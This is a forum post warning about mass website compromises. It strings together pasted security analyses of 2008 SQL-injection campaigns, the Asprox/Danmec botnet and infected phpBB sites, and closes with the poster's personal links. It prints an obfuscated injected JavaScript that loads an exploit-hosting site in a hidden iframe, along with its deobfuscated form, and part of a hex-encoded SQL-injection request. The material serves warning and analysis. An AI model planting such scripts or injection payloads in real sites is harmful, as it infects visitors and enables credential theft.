There is some one going around a attack on most web pages
You can lock this post idk i just want to warn you guys cuz this hack edits the links on the site an sends you to another site my site an meany meany others got attacked here i found this one what happend. (Im just trying to warn an help you guys out.Im not trying to do any thing bad)
There have been a lot of discussions going on about these injection attacks. The one thing in common so far has been that the culprits are abusing security vulnerabilities in various web applications, mainly SQL injection.
Exploiting of such vulnerabilities became relatively easy (since there are many vulnerable applications that use similar backend logic), so the bad guys started releasing various tools that enable them to compromise sites automatically. I analyzed one such tool at http://isc.sans.org/diary.html?storyid=4294, which was probably used for a lot of SQL injection attacks we have seen lately (but be aware that other similar tools exist and are actively used in the underground, one such tool in use with botnets was analyzed by Joe at SecureWorks, http://www.secureworks.com/research/threats/danmecasprox/).
While the motive for this is more or less standard – steal credentials or virtual goods so you can convert/sell that for real money (Mike and Steven from Shadowserver posted very nice articles at http://www.shadowserver.org/wiki/pmwiki.php?n=Calendar.20080507 and http://www.shadowserver.org/wiki/pmwiki.php?n=Calendar.20080513) - while analyzing one such site today I saw an interesting rant, presumably by the author.
The site has already been mentioned multiple times (www.ririwow.cn, which appears to be finally taken down). The majority of attacks actually pointed to this site which happily served some exploits to the end user. However, this time the main index.htm file had this text appended at the bottom:
"This is a mass invasion. Safeguard the motherland's dignity!
F*** FRANCE! F*** CNN! I WILL ATTACK you ALWAYS !
I love my motherland!
sorry
Please understand that I
IF YOU WANT TO SAY SOMETHING .
PLEASE SEND EMAIL TO kiss117276@163.com "
(language edited)
Interesting. While this could have been added by anyone, I found another interesting thing thanks to a heads up from our friend Paul from pauldotcom.com. Paul analyzed a compromised site which had this piece of JavaScript inserted:
eval(function(p,a,c,k,e,d){e=function(c){return(c<a?'':e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode
(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--)d[e(c)]=k[c]||e(c);k=[function(e){return[e]}];e=functio
n(){return'\w+'};c=1};while(c--)if(k[c])p=p.replace(new RegExp('\b'+e(c)+'\b','g'),k[c]);returnp}('8(b.e=='i-2
'){}4{3.g("<9d=7://h.c.2/a.6 f=15=0></9>");}',62,19,'|100|cn|document|else|height|htm|http|if|iframe|index
|navigator|ririwow|src|systemLanguage|width|writeln|www|zh'.split('|'),0,{}))
After deobfuscating the code, we get this:
if (navigator.systemLanguage=='zh-cn'){}else{document.writeln("<iframe
src=http://www.ririwow.cn/index.htm" width=100 height=0></iframe>");}
In other words, the code checks if the system language variable is set to ZH-CN (which is set on systems running in Chinese) and redirects you to the site hosting exploit only if that is not true. So the rant might really be from the author, after all since the code is attacking all non-Chinese machines. Are we getting more serious with this or the bottom line is still (and only) information stealing and money.
More info
Danmec is a password-stealing trojan which has been around for a couple of years, but in the last year new components have been introduced by the author, turning it into a more complete crimeware family. One of these components (developed last year) is the Asprox trojan, which is designed to create a spam botnet which appears to be solely dedicated to sending phishing emails. As of yesterday, we observed the Asprox botnet pushing an update to the infected systems, a binary with the filename msscntr32.exe. The executable is installed as a system service with the name "Microsoft Security Center Extension", but in reality it is a SQL-injection attack tool.
When launched, the attack tool will search Google for .asp pages which contain various terms, and will then launch SQL injection attacks against the websites returned by the search. The attack is designed to inject an iframe into the website source which will force visitors to download a javascript file from the domain direct84.com. This file in turn redirects to another site, where additional malicious javascript can be found. Currently the secondary site appears to be down, however it is likely that when successful, the site attempts to exploit the visitor's web browser in order to install additional copies of either Danmec, Asprox and/or the SQL attack tool.
Because the tool is distributed by the botnet, it may appear to be worm-like in its operation, which may lead to conflicting reports in the media and blogs about the true nature of the attack. However, the SQL attack tool does not spread on its own, it relies on the Asprox botnet in order to propagate to new hosts. Additionally, a similar attack technique is currently being seen spreading game-password-stealing trojans from China. Whether the tool is related or just the attack syntax is shared, it is clear that SQL injection attack activity is on the rise from multiple sources.
The initial HTTP requests used by the msscntr32.exe attack tool will appear similar to the following:
GET /page.asp?id=425;DECLARE%20@S%20NVARCHAR(4000);SET%20
@S=CAST(0x4400450043004C004100520045002000400054002000760061007200630 0680061007200280032003500350029002C00400043002000760061007200630068006 10072002800320035003500290020004400450043004C00410052004500200www.example.com
HTTP/1.1
Accept: text/html, application/xml;q=0.9, application/xhtml+xml,
*/*;q=0.1
Accept-Language: en-gb
Accept-Encoding: deflate
User-Agent: Mozilla/5.0 (Windows NT 5.1; U; en; rv:1.8.0) Gecko/20060728 Firefox/1.5.0 Opera 9.25
Host: www.example.com
Connection: Close
Note the use of both Firefox and Opera in the User-Agent string. This could be an effective means to block the attack in the short term, since User-Agent ACLs are built in to most modern webservers. However, this is not likely to stay constant.
Last weekend attackers once again injected a link to malicious JavaScript into hundreds of thousands of websites. The JavaScript redirects visitors to another site that ostensibly contains a video for which the user needs a special codec – but the download is in fact a Trojan of the Zlob family.
According to the Internet Storm Center, most of the contaminated websites contain installations of the phpBB forum. It is not yet clear what vulnerabilities the criminals behind the mass attack exploited. Trend Micro speculates that the sites have poorly configured installations or out of date versions of phpBB that contain security holes. A Google search for the embedded JavaScript currently yields some 200,000 infected websites.
Users who download the "codec" not only get the Zlob Trojan, but also a DNSChanger that sets Windows DNS entries to fake servers which redirect requests for banking sites to the addresses of phishing sites. The phoney codec also downloads additional malicious baggage. Virus scanner detection is patchy. Avast, CA, Gdata, McAfee, NOD32, Panda and Symantec do not yet recognize the virus – more than a third of the virus scanners in the most recent c't virus scanner test
Myspace:http://www.myspace.com/DEATH1sniper
Hame Page:http://snipereliteforce.spruz.com/
AMSHNOK!!!
